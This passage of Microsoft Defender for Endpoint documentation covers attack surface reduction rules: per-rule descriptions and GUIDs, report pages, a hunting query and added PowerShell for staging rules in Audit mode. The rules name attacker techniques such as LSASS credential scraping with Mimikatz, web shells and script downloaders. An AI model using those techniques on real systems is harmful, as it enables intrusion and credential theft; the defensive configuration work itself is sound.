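    # Add-MpPreference merges these IDs into the existing rule list; Set-MpPreference with
    # the same parameters would replace the whole list. One action applies to all IDs given.
    Add-MpPreference -AttackSurfaceReductionRules_Ids $StandardProtectionRules -AttackSurfaceReductionRules_Actions Enabled
    Add-MpPreference -AttackSurfaceReductionRules_Ids $AuditFirstRules -AttackSurfaceReductionRules_Actions AuditMode
    Add-MpPreference -AttackSurfaceReductionRules_Ids $WarnRules -AttackSurfaceReductionRules_Actions $warnAction
}

function Get-AsrRuleState {
    # Get-MpPreference exposes the configuration as two parallel arrays: rule IDs and action codes.
    $prefs   = Get-MpPreference
    $ids     = @($prefs.AttackSurfaceReductionRules_Ids)
    $actions = @($prefs.AttackSurfaceReductionRules_Actions)
    for ($i = 0; $i -lt $ids.Count; $i++) {
        $code = [int]$actions[$i]
        [pscustomobject]@{
            RuleId = $ids[$i]
            Code   = $code
            Mode   = if ($ModeNames.ContainsKey($code)) { $ModeNames[$code] } else { "Unknown($code)" }
        }
    }
}

Set-AsrBaseline
Get-AsrRuleState | Sort-Object Mode, RuleId | Format-Table -AutoSize
```

Reading the state back after applying it is the useful part: a rule that reports code 1 where Warn was requested tells you the device is below build 17763, and a rule that is missing from the list entirely was never applied, which an Add-MpPreference call would not report on its own.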

Per rule descriptions

Block abuse of exploited vulnerable signed drivers

This rule prevents an application from writing a vulnerable signed driver to disk. In-the-
wild, vulnerable signed drivers can be exploited by local applications - that have
sufficient privileges - to gain access to the kernel. Vulnerable signed drivers enable
attackers to disable or circumvent security solutions, eventually leading to system
compromise.

The Block abuse of exploited vulnerable signed drivers rule doesn't block a driver
already existing on the system from being loaded.

7 Note

You can configure this rule using Intune OMA-URI. See Intune OMA-URI for
configuring custom rules.

You can also configure this rule using PowerShell.

To have a driver examined, use this Web site to Submit a driver for analysis .

Intune Name: Block abuse of exploited vulnerable signed drivers

Configuration Manager name: Not yet available

GUID: 56a863a9-875e-4185-98a7-b882c64b5ce5

Advanced hunting action type:

AsrVulnerableSignedDriverAudited
AsrVulnerableSignedDriverBlocked

Block Adobe Reader from creating child processes

This rule prevents attacks by blocking Adobe Reader from creating processes.

Malware can download and launch payloads and break out of Adobe Reader through
social engineering or exploits. By blocking child processes from being generated by
Adobe Reader, malware attempting to use Adobe Reader as an attack vector is
prevented from spreading.

Intune name: Process creation from Adobe Reader (beta)

Configuration Manager name: Not yet available


GUID: 7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c

Advanced hunting action type:

AsrAdobeReaderChildProcessAudited
AsrAdobeReaderChildProcessBlocked

Dependencies: Microsoft Defender Antivirus

Block all Office applications from creating child processes

This rule blocks Office apps from creating child processes. Office apps include Word,
Excel, PowerPoint, OneNote, and Access.

Creating malicious child processes is a common malware strategy. Malware that abuses
Office as a vector often runs VBA macros and exploit code to download and attempt to
run more payloads. However, some legitimate line-of-business applications might also
generate child processes for benign purposes, such as spawning a command prompt or
using PowerShell to configure registry settings.

Intune name: Office apps launching child processes

Configuration Manager name: Block Office application from creating child
processes

GUID: d4f940ab-401b-4efc-aadc-ad5f3c50688a

Advanced hunting action type:

AsrOfficeChildProcessAudited
AsrOfficeChildProcessBlocked

Dependencies: Microsoft Defender Antivirus

Block credential stealing from the Windows local security authority subsystem

This rule helps prevent credential stealing by locking down Local Security Authority
Subsystem Service (LSASS).

LSASS authenticates users who sign in on a Windows computer. Microsoft Defender
Credential Guard in Windows normally prevents attempts to extract credentials from
LSASS. Some organizations can't enable Credential Guard on all of their computers
because of compatibility issues with custom smartcard drivers or other programs that
load into the Local Security Authority (LSA). In these cases, attackers can use tools like
Mimikatz to scrape cleartext passwords and NTLM hashes from LSASS.

By default the state of this rule is set to block. In most cases, many processes make calls
to LSASS requesting access rights that they don't actually need; for example, the initial
block from the ASR rule is often followed by a subsequent call for a lesser privilege that
succeeds. For information about the types of rights that are typically requested in process
calls to LSASS, see: Process Security and Access Rights.

7 Note

In some apps, the code enumerates all running processes and attempts to open
them with exhaustive permissions. This rule denies the app's process open action
and logs the details to the security event log. This rule can generate a lot of noise. If
you have an app that simply enumerates LSASS, but has no real impact in
functionality, there is no need to add it to the exclusion list. By itself, this event log
entry doesn't necessarily indicate a malicious threat.

Intune name: Flag credential stealing from the Windows local security authority
subsystem

Configuration Manager name: Block credential stealing from the Windows local
security authority subsystem

GUID: 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2

Advanced hunting action type:

AsrLsassCredentialTheftAudited
AsrLsassCredentialTheftBlocked

Dependencies: Microsoft Defender Antivirus

Block executable content from email client and webmail

This rule blocks email opened within the Microsoft Outlook application, or Outlook.com
and other popular webmail providers from propagating the following file types:

Executable files (such as .exe, .dll, or .scr)
Script files (such as a PowerShell .ps1, Visual Basic .vbs, or JavaScript .js file)

Intune name: Execution of executable content (exe, dll, ps, js, vbs, etc.) dropped
from email (webmail/mail client) (no exceptions)

Microsoft Configuration Manager name: Block executable content from email client
and webmail

GUID: be9ba2d9-53ea-4cdc-84e5-9b1eeee46550

Advanced hunting action type:

AsrExecutableEmailContentAudited
AsrExecutableEmailContentBlocked

Dependencies: Microsoft Defender Antivirus

7 Note

The rule Block executable content from email client and webmail has the
following alternative descriptions, depending on which application you use:

Intune (Configuration Profiles): Execution of executable content (exe, dll, ps, js,
vbs, etc.) dropped from email (webmail/mail client) (no exceptions).
Configuration Manager: Block executable content download from email and
webmail clients.
Group Policy: Block executable content from email client and webmail.

Block executable files from running unless they meet a prevalence, age, or trusted list criterion

This rule blocks executable files, such as .exe, .dll, or .scr, from launching unless they
meet the prevalence, age, or trusted list criteria. Launching untrusted or unknown
executable files can be risky, as it might not be initially clear if the files are malicious.

) Important

You must enable cloud-delivered protection to use this rule.

The rule Block executable files from running unless they meet a prevalence, age,
or trusted list criterion with GUID 01443614-cd74-433a-b99e-2ecdc07bfc25 is owned
by Microsoft and is not specified by admins. This rule uses cloud-delivered
protection to update its trusted list regularly.

You can specify individual files or folders (using folder paths or fully qualified
resource names) to exclude, but you can't specify which rules the exclusions apply to.

Intune name: Executables that don't meet a prevalence, age, or trusted list
criteria

Configuration Manager name: Block executable files from running unless they meet a
prevalence, age, or trusted list criteria

GUID: 01443614-cd74-433a-b99e-2ecdc07bfc25

Advanced hunting action type:

AsrUntrustedExecutableAudited
AsrUntrustedExecutableBlocked

Dependencies: Microsoft Defender Antivirus, Cloud Protection

Block execution of potentially obfuscated scripts

This rule detects suspicious properties within an obfuscated script.

) Important

PowerShell scripts are now supported for the "Block execution of potentially
obfuscated scripts" rule.

Script obfuscation is a common technique that both malware authors and legitimate
applications use to hide intellectual property or decrease script loading times. Malware
authors also use obfuscation to make malicious code harder to read, which hampers
close scrutiny by humans and security software.

Intune name: Obfuscated js/vbs/ps/macro code

Configuration Manager name: Block execution of potentially obfuscated scripts

GUID: 5beb7efe-fd9a-4556-801d-275e5ffc04cc

Advanced hunting action type:

AsrObfuscatedScriptAudited
AsrObfuscatedScriptBlocked

Dependencies: Microsoft Defender Antivirus, AntiMalware Scan Interface (AMSI)


Block JavaScript or VBScript from launching downloaded
executable content
This rule prevents scripts from launching potentially malicious downloaded content.
Malware written in JavaScript or VBScript often acts as a downloader to fetch and launch
other malware from the Internet.

Although not common, line-of-business applications sometimes use scripts to download
and launch installers.

Intune name: js/vbs executing payload downloaded from Internet (no exceptions)

Configuration Manager name: Block JavaScript or VBScript from launching downloaded
executable content

GUID: d3e037e1-3eb8-44c8-a917-57927947596d

Advanced hunting action type:

AsrScriptExecutableDownloadAudited
AsrScriptExecutableDownloadBlocked

Dependencies: Microsoft Defender Antivirus, AMSI

Block Office applications from creating executable content

This rule prevents Office apps, including Word, Excel, and PowerPoint, from creating
potentially malicious executable content, by blocking malicious code from being written
to disk.

Malware that abuses Office as a vector might attempt to break out of Office and save
malicious components to disk. These malicious components would survive a computer
reboot and persist on the system. Therefore, this rule defends against a common
persistence technique. This rule also blocks execution of untrusted files that may have
been saved by Office macros that are allowed to run in Office files.

Intune name: Office apps/macros creating executable content

Configuration Manager name: Block Office applications from creating executable
content

GUID: 3b576869-a4ec-4529-8536-b80a7769e899
Advanced hunting action type:

AsrExecutableOfficeContentAudited
AsrExecutableOfficeContentBlocked

Dependencies: Microsoft Defender Antivirus, RPC

Block Office applications from injecting code into other processes

This rule blocks code injection attempts from Office apps into other processes.

) Important

This rule requires restarting Microsoft 365 Apps (Office applications) for the
configuration changes to take effect.

Attackers might attempt to use Office apps to migrate malicious code into other
processes through code injection, so the code can masquerade as a clean process.

There are no known legitimate business purposes for using code injection.

This rule applies to Word, Excel, OneNote, and PowerPoint.

Intune name: Office apps injecting code into other processes (no exceptions)

Configuration Manager name: Block Office applications from injecting code into
other processes

GUID: 75668c1f-73b5-4cf0-bb93-3ecf5cb7cc84

Advanced hunting action type:

AsrOfficeProcessInjectionAudited
AsrOfficeProcessInjectionBlocked

Dependencies: Microsoft Defender Antivirus

Block Office communication application from creating child processes

This rule prevents Outlook from creating child processes, while still allowing legitimate
Outlook functions.

This rule protects against social engineering attacks and prevents exploit code from
abusing vulnerabilities in Outlook. It also protects against Outlook rules and forms
exploits that attackers can use when a user's credentials are compromised.

7 Note

This rule blocks DLP policy tips and ToolTips in Outlook. This rule applies to
Outlook and Outlook.com only.

Intune name: Process creation from Office communication products (beta)

Configuration Manager name: Not available

GUID: 26190899-1602-49e8-8b27-eb1d0a1ce869

Advanced hunting action type:

AsrOfficeCommAppChildProcessAudited
AsrOfficeCommAppChildProcessBlocked

Dependencies: Microsoft Defender Antivirus

Block persistence through WMI event subscription


This rule prevents malware from abusing WMI to attain persistence on a device.

) Important

File and folder exclusions don't apply to this attack surface reduction rule.

Fileless threats employ various tactics to stay hidden, to avoid being seen in the file
system, and to gain periodic execution control. Some threats can abuse the WMI
repository and event model to stay hidden.

Intune name: Persistence through WMI event subscription

Configuration Manager name: Not available

GUID: e6db77e5-3df2-4cf1-b95a-636979351e5b

Advanced hunting action type:

AsrPersistenceThroughWmiAudited
AsrPersistenceThroughWmiBlocked

Dependencies: Microsoft Defender Antivirus, RPC

Block process creations originating from PSExec and WMI commands

This rule blocks processes created through PsExec and WMI from running. Both PsExec
and WMI can remotely execute code. There's a risk of malware abusing functionality of
PsExec and WMI for command and control purposes, or to spread an infection
throughout an organization's network.

2 Warning

Only use this rule if you're managing your devices with Intune or another MDM
solution. This rule is incompatible with management through Microsoft Endpoint
Configuration Manager because this rule blocks WMI commands the
Configuration Manager client uses to function correctly.

Intune name: Process creation from PSExec and WMI commands

Configuration Manager name: Not applicable

GUID: d1e49aac-8f56-4280-b9ba-993a6d77406c

Advanced hunting action type:

AsrPsexecWmiChildProcessAudited
AsrPsexecWmiChildProcessBlocked

Dependencies: Microsoft Defender Antivirus

Block rebooting machine in Safe Mode (preview)


This rule prevents the execution of commands to restart machines in Safe Mode.

Safe Mode is a diagnostic mode that only loads the essential files and drivers needed for
Windows to run. However, in Safe Mode, many security products are either disabled or
operate in a limited capacity, which allows attackers to further launch tampering
commands, or simply execute and encrypt all files on the machine. This rule blocks such
attacks by preventing processes from restarting machines in Safe Mode.

7 Note

This capability is currently in preview. Additional upgrades to improve efficacy are
under development.

Intune Name: [PREVIEW] Block rebooting machine in Safe Mode

Configuration Manager name: Not yet available

GUID: 33ddedf1-c6e0-47cb-833e-de6133960387

Dependencies: Microsoft Defender Antivirus

Block untrusted and unsigned processes that run from USB

With this rule, admins can prevent unsigned or untrusted executable files from running
from USB removable drives, including SD cards. Blocked file types include executable
files (such as .exe, .dll, or .scr).

) Important

Files copied from the USB to the disk drive are blocked by this rule if and when they
are about to be executed on the disk drive.

Intune name: Untrusted and unsigned processes that run from USB

Configuration Manager name: Block untrusted and unsigned processes that run from
USB

GUID: b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4

Advanced hunting action type:

AsrUntrustedUsbProcessAudited
AsrUntrustedUsbProcessBlocked

Dependencies: Microsoft Defender Antivirus

Block use of copied or impersonated system tools (preview)

This rule blocks the use of executable files that are identified as copies of Windows
system tools. These files are either duplicates or impostors of the original system tools.

Some malicious programs may try to copy or impersonate Windows system tools to
avoid detection or gain privileges. Allowing such executable files can lead to potential
attacks. This rule prevents propagation and execution of such duplicates and impostors
of the system tools on Windows machines.

7 Note

This capability is currently in preview. Additional upgrades to improve efficacy are
under development.

Intune Name: [PREVIEW] Block use of copied or impersonated system tools

Configuration Manager name: Not yet available

GUID: c0033c00-d16d-4114-a5a0-dc9b3a7d2ceb

Dependencies: Microsoft Defender Antivirus

Block Webshell creation for Servers

This rule blocks web shell script creation on Microsoft Server with the Exchange role.

A web shell script is a specifically crafted script that allows an attacker to control the
compromised server. A web shell may include functionality such as receiving and
executing malicious commands, downloading and executing malicious files, stealing and
exfiltrating credentials and sensitive information, identifying potential targets, and so on.

Intune name: Block Webshell creation for Servers

GUID: a8f5898e-1dc8-49a9-9878-85004b8a61e6

Dependencies: Microsoft Defender Antivirus

Block Win32 API calls from Office macros


This rule prevents VBA macros from calling Win32 APIs.

Office VBA enables Win32 API calls. Malware can abuse this capability, such as calling
Win32 APIs to launch malicious shellcode without writing anything directly to disk.
Most organizations don't rely on the ability to call Win32 APIs in their day-to-day
functioning, even if they use macros in other ways.

Intune name: Win32 imports from Office macro code

Configuration Manager name: Block Win32 API calls from Office macros

GUID: 92e97fa1-2edf-4476-bdd6-9dd0b4dddc7b

Advanced hunting action type:

AsrOfficeMacroWin32ApiCallsAudited
AsrOfficeMacroWin32ApiCallsBlocked

Dependencies: Microsoft Defender Antivirus, AMSI

Use advanced protection against ransomware


This rule provides an extra layer of protection against ransomware. It uses both client
and cloud heuristics to determine whether a file resembles ransomware. This rule
doesn't block files that have one or more of the following characteristics:

The file has already been found to be harmless in the Microsoft cloud.
The file is a valid signed file.
The file is prevalent enough to not be considered ransomware.

The rule tends to err on the side of caution to prevent ransomware.

7 Note

You must enable cloud-delivered protection to use this rule.

Intune name: Advanced ransomware protection

Configuration Manager name: Use advanced protection against ransomware

GUID: c1db55ab-c21a-4637-bb3f-a12568109d35

Advanced hunting action type:

AsrRansomwareAudited
AsrRansomwareBlocked

Dependencies: Microsoft Defender Antivirus, Cloud Protection
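
The rules in this reference are identified by GUID, and the usual rollout is to stage a
rule in Audit mode before switching it to Block. The following PowerShell is an added
example, not code from the Microsoft documentation: it moves a set of the rules listed
above into Audit mode with the Defender Antivirus cmdlets, and refuses to touch a rule
that is already enforcing in Block mode so that a staged rollout never weakens an
existing setting. Get-MpPreference and Add-MpPreference are the real cmdlets; the
function and variable names, and the choice of rules, are ours. The numeric action
values (0 = Not configured/Disabled, 1 = Block, 2 = Audit, 6 = Warn) are the values
Get-MpPreference reports. Run it from an elevated PowerShell session on a device where
Microsoft Defender Antivirus is the primary antivirus.

```powershell
# Added example (not from the Microsoft documentation): stage selected ASR rules
# into Audit mode without downgrading rules that are already in Block mode.

# GUIDs as listed in the rules reference on this page.
$AsrRulesToStage = @(
    '3b576869-a4ec-4529-8536-b80a7769e899'  # Block Office applications from creating executable content
    '75668c1f-73b5-4cf0-bb93-3ecf5cb7cc84'  # Block Office applications from injecting code into other processes
    'e6db77e5-3df2-4cf1-b95a-636979351e5b'  # Block persistence through WMI event subscription
    '92e97fa1-2edf-4476-bdd6-9dd0b4dddc7b'  # Block Win32 API calls from Office macros
    'c1db55ab-c21a-4637-bb3f-a12568109d35'  # Use advanced protection against ransomware (needs cloud-delivered protection)
)

# Numeric action values reported by Get-MpPreference.
$AsrActionBlock = 1
$AsrActionAudit = 2

function Get-AsrRuleState {
    # Returns a hashtable of rule GUID (lower-case) -> numeric action for every
    # rule whose setting is something other than Not configured.
    $prefs   = Get-MpPreference
    $ids     = @($prefs.AttackSurfaceReductionRules_Ids | Where-Object { $_ })
    $actions = @($prefs.AttackSurfaceReductionRules_Actions | Where-Object { $null -ne $_ })
    $state = @{}
    for ($i = 0; $i -lt $ids.Count; $i++) {
        $state[$ids[$i].ToLower()] = [int]$actions[$i]
    }
    return $state
}

function Set-AsrRulesToAudit {
    # Puts each rule in $RuleIds into Audit mode unless it is already in Audit
    # or Block. With -DryRun it only reports what it would change.
    param([Parameter(Mandatory)][string[]]$RuleIds, [switch]$DryRun)
    $state = Get-AsrRuleState
    foreach ($id in $RuleIds) {
        $current = $state[$id.ToLower()]
        if ($current -eq $AsrActionBlock) {
            Write-Host "SKIP  $id is already in Block mode; not downgrading"
            continue
        }
        if ($current -eq $AsrActionAudit) {
            Write-Host "OK    $id is already in Audit mode"
            continue
        }
        if ($DryRun) {
            Write-Host "WOULD $id -> Audit"
            continue
        }
        # Add-MpPreference merges into the existing rule list. One ID and one
        # action per call keeps the Ids and Actions arrays aligned.
        Add-MpPreference -AttackSurfaceReductionRules_Ids $id `
                         -AttackSurfaceReductionRules_Actions AuditMode
        Write-Host "SET   $id -> Audit"
    }
}

# Preview first; drop -DryRun to apply.
Set-AsrRulesToAudit -RuleIds $AsrRulesToStage -DryRun
```

After the rules have run in Audit mode for a while, the audit events (see the
troubleshooting and advanced hunting sections later on this page) show which
legitimate processes would have been blocked, and that is the input for deciding which
rules to promote to Block and which exclusions are really needed.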


See also
Attack surface reduction rules deployment overview
Plan attack surface reduction rules deployment
Test attack surface reduction rules
Enable attack surface reduction rules
Operationalize attack surface reduction rules
Attack surface reduction (ASR) rules report
Attack surface reduction rules reference
Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus

 Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .



Attack surface reduction rules report
Article • 03/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Platforms:

Windows

) Important

Some information relates to prerelease product which may be substantially
modified before it's commercially released. Microsoft makes no warranties, express
or implied, with respect to the information provided here.

The attack surface reduction rules report provides information about the attack surface
reduction rules that are applied to devices in your organization. This report also provides
information about:

detected threats
blocked threats
devices that aren't configured to use the standard protection rules to block threats

Additionally, this report provides an easy-to-use interface that enables you to:

View threat detections
View the configuration of the ASR rules
Configure (add) exclusions
Easily activate basic protection by enabling the three most recommended ASR rules
with a single toggle
Drill down to gather detailed information

For more information about individual attack surface reduction rules, see Attack surface
reduction rules reference.

Prerequisites
) Important

To access the Attack surface reduction rules report, read permissions are required
for the Microsoft Defender portal. Access to this report granted by Microsoft Entra
roles, such as Security Global Admin or Security role, is being deprecated and will
be removed in April 2023. For Windows Server 2012 R2 and Windows Server 2016
to appear in the Attack surface reduction rules report, these devices must be
onboarded using the modern unified solution package. For more information, see
New functionality in the modern unified solution for Windows Server 2012 R2
and 2016.

Report access permissions


To access the Attack surface reduction rules report in the Microsoft 365 Security
dashboard, the following permissions are required:

Permission type                    | Permission       | Permission display name
-----------------------------------|------------------|----------------------------
Application                        | Machine.Read.All | 'Read all machine profiles'
Delegated (work or school account) | Machine.Read     | 'Read machine information'

To assign these permissions:

1. Sign in to Microsoft Defender XDR using an account with the Security administrator or
Global administrator role assigned.
2. In the navigation pane, select Settings > Endpoints > Roles (under Permissions).
3. Select the role you'd like to edit.
4. Select Edit.
5. In Edit role, on the General tab, in Role name, type a name for the role.
6. In Description, type a brief summary of the role.
7. In Permissions, select View Data, and under View Data select Attack surface
reduction.

For more information about user role management, see Create and manage roles for
role-based access control.

Navigation
To navigate to the summary cards for the attack surface reduction rules report

1. Open the Microsoft Defender XDR portal.
2. In the left panel, select Reports, and in the main section, under Reports, select
Security report.
3. Scroll down to Devices to find the Attack surface reduction rules summary cards.

The summary report cards for ASR rules are shown in the following figure.

ASR rules report summary cards

The ASR rules report summary is divided into two cards:

ASR rule detections summary card
ASR rule configuration summary card

ASR rules detections summary card


Shows a summary of the number of detected threats blocked by ASR rules.

Provides two 'action' buttons:

View detections - opens the Attack surface reduction rules > main Detections tab
Add exclusions - Opens the Attack surface reduction rules > main Exclusions tab

Clicking on the ASR rules detections link at the top of the card also opens the main
Attack surface reduction rules Detections tab.

ASR rules configuration summary card


The top section focuses on three recommended rules, which protect against common
attack techniques. This card shows current-state information about the computers in
your organization that have the three ASR standard protection rules set to Block mode,
Audit mode, or off (not configured). The Protect devices button shows full configuration
details for only those three rules, so customers can quickly take action to enable them.

The bottom section surfaces six rules based on the number of unprotected devices per
rule. The "View configuration" button surfaces all configuration details for all ASR rules.
The "Add exclusion" button shows the add exclusion page with all detected file/process
names listed for Security Operation Center (SOC) to evaluate. The Add exclusion page is
linked to Microsoft Intune.

Provides two 'action' buttons:

View configuration - opens the Attack surface reduction rules > main Detections
tab
Add exclusions - Opens the Attack surface reduction rules > main Exclusions tab

Clicking on the ASR rules configuration link at the top of the card also opens the main
Attack surface reduction rules Configuration tab.

Simplified standard protection option


The configuration summary card provides a button to Protect devices with the three
standard protection rules. At minimum, Microsoft recommends that you enable these
three attack surface reduction standard protection rules:

Block credential stealing from the Windows local security authority subsystem
(lsass.exe)
Block abuse of exploited vulnerable signed drivers
Block persistence through Windows Management Instrumentation (WMI) event
subscription

To enable the three standard protection rules:

1. Select Protect devices. The main Configuration tab opens.
2. On the Configuration tab, Basic rules automatically toggles from All rules to
Standard protection rules enabled.
3. In the Devices list, select the devices for which you want the standard protection
rules to apply, and then select Save.

This card has two other navigation buttons:

View configuration - Opens the Attack surface reduction rules > main
Configuration tab.
Add exclusions - Opens the Attack surface reduction rules > main Exclusions tab.

Clicking on the ASR rules configuration link at the top of the card also opens the main
Attack surface reduction rules Configuration tab.

Attack surface reduction rules main tabs


While the ASR rules report summary cards are useful for getting a quick summary of your
ASR rules status, the main tabs provide more in-depth information with filtering and
configuration capabilities:

Detections tab
Configuration tab
Exclusions tab

Search capabilities
The Detections, Configuration, and Add exclusions main tabs have a search capability.
With it, you can search by device ID, file name, or process name.

Filtering
Filtering provides a way for you to specify what results are returned:

Date enables you to specify a date range for data results.

Filters

7 Note

When filtering by rule, the number of individual detected items listed in the lower
half of the report is currently limited to 200 rules. You can use Export to save the
full list of detections to Excel.

 Tip

As the filter currently functions in this release, every time you want to "group by",
you must first scroll down to the last detection in the list to load the complete data
set. After you have loaded the complete data set, you can then launch the "sort by"
filtering. If you don't scroll down to the last listed detection on every use, or when
changing filtering options (for example, the ASR rules applied to the current filter
run), the results will be incorrect for any result that has more than one viewable
page of listed detections.

Attack surface reduction rules main detections tab

Audit Detections: Shows how many threat detections were captured by rules set in
Audit mode.
Blocked Detections: Shows how many threat detections were blocked by rules set
in Block mode.
Large, consolidated graph: Shows blocked and audited detections.

The graphs provide detection data over the displayed date range, with the capability to
hover over a specific location to gather date-specific information.

The bottom section of the report lists detected threats - on a per-device basis - with the
following fields:

Field name       | Definition
-----------------|------------------------------------------------------------------------------
Detected file    | The file determined to contain a possible or known threat
Detected on      | The date the threat was detected
Blocked/Audited? | Whether the detecting rule for the specific event was in Block or Audit mode
Rule             | Which rule detected the threat
Source app       | The application that made the call to the offending "detected file"
Device           | The name of the device on which the Audit or Block event occurred
Device group     | The Active Directory group to which the device belongs
User             | The machine account responsible for the call
Publisher        | The company that released the particular .exe or application

For more information about ASR rule audit and block modes, see Attack surface
reduction rule modes.

Actionable flyout

The "Detection" main page lists all detections (files/processes) in the last 30 days.
Select any detection to open a flyout with drill-down capabilities.

The Possible exclusion and impact section shows the impact of the selected file or
process. You can:

Select Go hunt, which opens the Advanced Hunting query page
Select Open file page, which opens the Microsoft Defender for Endpoint detection
Select Add exclusion, which is linked with the Add exclusion main page

The following image illustrates how the Advanced Hunting query page opens from the
link on the actionable flyout:

For more information about Advanced hunting, see Proactively hunt for threats with
advanced hunting in Microsoft Defender XDR.

Attack surface reduction rules main Configuration tab


The ASR rules main Configuration tab provides summary and per-device ASR rules
configuration details. There are three main aspects to the Configuration tab:

Basic rules Provides a method to toggle results between Basic rules and All Rules. By
default, Basic rules is selected.

Device configuration overview Provides a current snapshot of devices in one of the
following states:

All exposed Devices (devices with missing prerequisites, rules in Audit mode,
misconfigured rules, or rules not configured)
Devices with rules not configured
Devices with rules in audit mode
Devices with rules in block mode

The lower, unnamed section of the Configuration tab provides a listing of the current
state of your devices (on a per-device basis):

Device (name)
Overall configuration (Whether any rules are on or all are off)
Rules in block mode (the number of rules per-device set to block)
Rules in audit mode (the number of rules in audit mode)
Rules turned off (rules that are turned off or aren't enabled)
Device ID (device GUID)

These elements are shown in the following figure.

To enable ASR rules:

1. Under Device, select the device or devices for which you want to apply ASR rules.
2. In the flyout window, verify your selections and then select Add to policy.

The Configuration tab and add rule flyout are shown in the following image.

Note: If you have devices that require different ASR rules to be applied, you should
configure those devices individually.

Attack surface reduction rules Add exclusions tab


The Add exclusions tab presents a ranked list of detections by file name and provides a
method to configure exclusions. By default, Add exclusions information is listed for
three fields:

File name The name of the file that triggered the ASR rules event.
Detections The total number of detected events for the named file. Individual devices
can trigger multiple ASR rules events.
Devices The number of devices on which the detection occurred.

) Important

Excluding files or folders can severely reduce the protection provided by ASR rules.
Excluded files are allowed to run, and no report or event will be recorded. If ASR
rules are detecting files that you believe shouldn't be detected, you should use
audit mode first to test the rule.

When you select a file, a Summary & expected impact fly out opens, presenting the
following types of information:

Files selected The number of files you've selected for exclusion
(number of) detections States the expected reduction in detections after adding
the selected exclusion(s). The reduction in detections is represented graphically for
Actual detections and Detections after exclusions
(number of) affected devices States the expected reduction in devices that report
detections for the selected exclusions.

The Add exclusion page has two buttons for actions that can be used on any detected
files (after selection). You can:

Add exclusion, which opens the Microsoft Intune ASR policy page. For more
information, see Intune in "Enable ASR rules alternate configuration methods."
Get exclusion paths, which downloads the file paths in CSV format

See also
Attack surface reduction rules deployment overview
Plan attack surface reduction rules deployment
Test attack surface reduction rules
Enable attack surface reduction rules
Operationalize attack surface reduction rules
Attack surface reduction (ASR) rules report
Attack surface reduction rules reference



Report and troubleshoot Defender for
Endpoint attack surface reduction rules
Article • 02/16/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

The Microsoft Defender portal is the new interface for monitoring and managing
security across your Microsoft identities, data, devices, apps, and infrastructure. Here
you can easily view the security health of your organization, act to configure devices,
users, and apps, and get alerts for suspicious activity. The Microsoft Defender portal is
intended for security admins and security operations teams to better manage and
protect their organization. Visit the Microsoft Defender portal
at https://security.microsoft.com.

In the Microsoft Defender portal, we offer you a complete look at the current attack
surface reduction rules configuration and events in your estate. Your devices must be
onboarded into the Microsoft Defender for Endpoint service for these reports to be
populated. Here's a screenshot from the Microsoft Defender portal (under Reports >
Devices > Attack surface reduction). At the device level, select Configuration from the
Attack surface reduction rules pane. The following screen is displayed, where you can
select a specific device and check its individual attack surface reduction rule
configuration.

Microsoft Defender for Endpoint - Advanced hunting

One of the most powerful features of Microsoft Defender for Endpoint is advanced
hunting. If you're unfamiliar with advanced hunting, see Proactively hunt for threats
with advanced hunting.

Advanced hunting is a query-based (Kusto Query Language) threat-hunting tool that
lets you explore up to 30 days of the captured (raw) data that Defender for Endpoint
collects from your devices. Through advanced hunting, you can proactively inspect
events to locate interesting indicators and entities. The flexible access to data helps
unconstrained hunting for both known and potential threats.

Through advanced hunting, it's possible to extract attack surface reduction rules
information, create reports, and get in-depth information on the context of a given
attack surface reduction rule audit or block event.

Attack surface reduction rules events can be queried from the DeviceEvents table in
the advanced hunting section of Microsoft Defender XDR. For example, a simple query
such as the one below reports all events that have attack surface reduction rules as
their data source for the last 30 days, and summarizes them by ActionType count; in
this case the ActionType is the actual code name of the attack surface reduction rule.

Kusto
DeviceEvents
| where Timestamp > ago(30d)
| where ActionType startswith "Asr"
| summarize EventCount=count() by ActionType

With advanced hunting you can shape the queries to your liking, so that you can see
what is happening, regardless of whether you want to pinpoint something on an
individual machine, or you want to extract insights from your entire environment.
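
The query above returns one row per ActionType, so each rule appears twice (its
Audited and its Blocked variant). The PowerShell below is an added example, not code
from the Microsoft documentation: it runs that same query through the Microsoft Graph
security API endpoint for advanced hunting (POST /security/runHuntingQuery) and folds
the rows into one line per rule with separate Audited and Blocked counts, which is the
shape you want when deciding which audit-mode rules are ready for Block. It assumes a
variable $AccessToken holding a bearer token for Microsoft Graph with the
ThreatHuntingData.Read.All permission; how that token is obtained is outside this
example. The function names are ours, and the sample rows at the bottom are
constructed so the pivot can be exercised offline.

```powershell
# Added example (not from the Microsoft documentation): run the page's ASR
# summary query via Microsoft Graph and pivot the result per rule.

# The query from this page, verbatim.
$AsrSummaryQuery = @'
DeviceEvents
| where Timestamp > ago(30d)
| where ActionType startswith "Asr"
| summarize EventCount=count() by ActionType
'@

function Invoke-AsrHuntingQuery {
    # Submits a KQL query to the Graph advanced hunting endpoint and returns
    # the result rows. $AccessToken is assumed to be obtained elsewhere.
    param(
        [Parameter(Mandatory)][string]$AccessToken,
        [string]$Query = $AsrSummaryQuery
    )
    $body = @{ Query = $Query } | ConvertTo-Json
    $response = Invoke-RestMethod -Method Post `
        -Uri 'https://graph.microsoft.com/v1.0/security/runHuntingQuery' `
        -Headers @{ Authorization = "Bearer $AccessToken" } `
        -ContentType 'application/json' `
        -Body $body
    # .results holds one object per row, with the columns the query projected.
    return $response.results
}

function ConvertTo-AsrRuleSummary {
    # Collapses AsrXxxAudited / AsrXxxBlocked rows into one row per rule.
    param([Parameter(Mandatory)][object[]]$Rows)
    $byRule = @{}
    foreach ($row in $Rows) {
        # The action type is the rule code name plus an Audited/Blocked suffix.
        if ($row.ActionType -match '^(Asr\w+?)(Audited|Blocked)$') {
            $rule = $Matches[1]
            $mode = $Matches[2]
            if (-not $byRule.ContainsKey($rule)) {
                $byRule[$rule] = [pscustomobject]@{ Rule = $rule; Audited = 0; Blocked = 0 }
            }
            $byRule[$rule].$mode += [int]$row.EventCount
        }
    }
    # Rules with Audited > 0 and Blocked = 0 are still in evaluation.
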